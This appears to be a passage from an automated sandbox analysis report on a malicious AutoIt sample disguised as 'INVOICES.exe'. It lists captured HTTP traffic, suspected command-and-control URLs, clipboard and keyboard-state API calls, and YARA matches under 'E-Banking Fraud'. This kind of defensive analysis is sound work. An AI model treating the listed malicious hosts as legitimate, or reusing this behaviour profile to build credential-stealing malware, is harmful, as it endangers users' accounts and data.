                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:48 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:51 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Oct 2024 15:56:53 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:57:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:57:16 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:57:19 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:57:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: AtBroker.exe, 00000005.00000002.3881258314.00000000058DE000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003C3E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://premium303max.rest/4sq5/?edD=auinYk/N7fzuxFx7OuKPDQsKV8iAhIfXxmAc
                Source: XORjEgwNIUb.exe, 00000006.00000002.3880793532.000000000556E000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.tangible.online
                Source: XORjEgwNIUb.exe, 00000006.00000002.3880793532.000000000556E000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.tangible.online/5byq/
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: AtBroker.exe, 00000005.00000003.1878415609.00000000044E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: AtBroker.exe, 00000005.00000002.3876263575.0000000000754000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.dpo-medicina.online&rand=
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://reg.ru
                Source: AtBroker.exe, 00000005.00000002.3877965889.000000000450E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005A70000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3883082226.0000000007710000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3881258314.0000000005296000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003DD0000.00000004.00000001.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.00000000035F6000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_l
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.dpo-medicina.online&utm_medium=parking&utm_campaign=s_lan
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.reg.ru/sozdanie-saita/
                Source: AtBroker.exe, 00000005.00000002.3881258314.0000000005104000.00000004.10000000.00040000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.0000000003464000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.0000000026C34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.dpo-medicina.online&amp;reg_source=parking_auto
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007A407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007A407C
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007A427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_007A427A
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007A407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_007A407C
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0079003A
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007BCB26 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_007BCB26

                E-Banking Fraud

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3877109191.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1651003689.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

Source: C:\Users\user\Desktop\INVOICES.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00733B4C
Source: INVOICES.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: INVOICES.exe, 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_70183a69-4
Source: INVOICES.exe, 00000000.00000002.1420879725.00000000007E4000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer" | memstr_ea7d5ff5-4
Source: initial sample | Static PE information: Filename: INVOICES.exe
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_00733633 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow, | 0_2_00733633
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BC216 PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W, | 0_2_007BC216
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BC502 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W, | 0_2_007BC502
Source: C:\Users\user\Desktop\INVOICES.exe | Code function: 0_2_007BC5E7 SendMessageW,NtdllDialogWndProc_W, | 0_2_007BC5E7
